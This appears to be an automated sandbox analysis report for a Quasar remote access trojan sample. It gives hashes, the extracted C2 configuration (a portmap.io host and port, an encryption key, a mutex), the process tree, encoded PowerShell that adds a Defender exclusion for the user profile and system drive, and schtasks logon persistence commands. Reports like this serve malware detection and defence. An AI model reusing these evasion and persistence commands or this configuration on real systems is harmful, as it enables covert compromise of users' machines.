Analysis
-
max time kernel
137s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2023, 14:25
Static task
static1
Behavioral task
behavioral1
Sample
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Resource
win7-20220812-en
General
-
Target
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
-
Size
354KB
-
MD5
8b54bcaf180119658155a1ba2909f082
-
SHA1
7813044ffe233a79eb5937e6affcfbc365427fc1
-
SHA256
58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
-
SHA512
fb9f1fe603c69a27c1fbf40067be9ef3273a791a40e8f262d98e2c16dcd1c6ecc36f359f1a8119532a078e0ba8f4065dc2ef44a1282d9b2f41578551ab8f6fd8
-
SSDEEP
6144:XbRHhzisehcChBB6aQaAIybtbJpHgxwkeDBWeSXpU+PtL11J//LbwDJQHgYCBfuB:Xb/Shzn4tbPAGkeLatL11J//LUDaAY2C
Malware Config
Extracted
quasar
1.3.0.0
Office04
192.168.0.125:4782
AeroNaut-25032.portmap.io:25032
QSR_MUTEX_e22Aj87Wn2XuKgDxxw
-
encryption_key
s8zrhKuw28Jjzjqpd6lo
-
install_name
Java.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
JavaStartup
-
subdirectory
SubDir
Signatures
-
Quasar payload 5 IoCs
resource yara_rule behavioral2/files/0x0001000000022df7-145.dat family_quasar behavioral2/files/0x0001000000022df7-146.dat family_quasar behavioral2/memory/2116-147-0x00000000009B0000-0x0000000000A0E000-memory.dmp family_quasar behavioral2/files/0x0003000000022df9-155.dat family_quasar behavioral2/files/0x0003000000022df9-156.dat family_quasar -
Executes dropped EXE 2 IoCs
pid Process 2116 Client-built.exe 4056 Java.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\SubDir\Java.exe Java.exe File opened for modification C:\Program Files (x86)\SubDir Java.exe File created C:\Program Files (x86)\SubDir\Java.exe Client-built.exe File opened for modification C:\Program Files (x86)\SubDir\Java.exe Client-built.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4308 schtasks.exe 2984 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4024 powershell.exe 4024 powershell.exe 2408 powershell.exe 2408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4024 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 2116 Client-built.exe Token: SeDebugPrivilege 4056 Java.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4056 Java.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 848 wrote to memory of 4024 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 82 PID 848 wrote to memory of 4024 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 82 PID 848 wrote to memory of 4024 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 82 PID 848 wrote to memory of 2408 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 84 PID 848 wrote to memory of 2408 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 84 PID 848 wrote to memory of 2408 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 84 PID 848 wrote to memory of 2116 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 86 PID 848 wrote to memory of 2116 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 86 PID 848 wrote to memory of 2116 848 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe 86 PID 2116 wrote to memory of 4308 2116 Client-built.exe 87 PID 2116 wrote to memory of 4308 2116 Client-built.exe 87 PID 2116 wrote to memory of 4308 2116 Client-built.exe 87 PID 2116 wrote to memory of 4056 2116 Client-built.exe 89 PID 2116 wrote to memory of 4056 2116 Client-built.exe 89 PID 2116 wrote to memory of 4056 2116 Client-built.exe 89 PID 4056 wrote to memory of 2984 4056 Java.exe 90 PID 4056 wrote to memory of 2984 4056 Java.exe 90 PID 4056 wrote to memory of 2984 4056 Java.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUwBvAHIAcgB5ACAAdABoAGUAIABmAGkAbABlACAAaQBzACAAdQBuAGQAZQByACAAbQBhAG4AYQBnAGUAbQBlAG4AdAAuACAAVABoAGUAIABmAGkAbABlACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBsAGUAYQBzAGUAZAAgAG4AZQB4AHQAIAB5AGUAYQByACEAIABmAG8AcgAgAG0AbwByAGUAIABmAGkAbABlAHMAIAAsACAAcABsAGUAYQBzAGUAIABjAGgAZQBjAGsAIABtAHkAIABkAGkAcwBjAG8AcgBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAbABmACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4308
-
-
C:\Program Files (x86)\SubDir\Java.exe"C:\Program Files (x86)\SubDir\Java.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2984
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
1KB
MD54cc9e7069534f7bcbb90ad7cac69ed78
SHA1a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA2564814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653
-
Filesize
18KB
MD5ba4f16a3fe5704136d34f3c9fa04d896
SHA15d2d6a763b61c5338583194d869171a7af14bafc
SHA2567f684196a3f6e786bed918870e0c3c84575991224b138b93a327de9ed249a03c
SHA512eccf2335489ea553201eec9c74149fba004adf1e450912a5e73a75bd713d8fb9b3bde2f84a15d0b2e296cfb2feacc10bb3e9c37d3b87bf95c5371aff29ddb0d0
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
-
Filesize
348KB
MD5c1c21a2fdc2f99f98c91ce2d1219cd96
SHA15bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA2560b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA5123b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf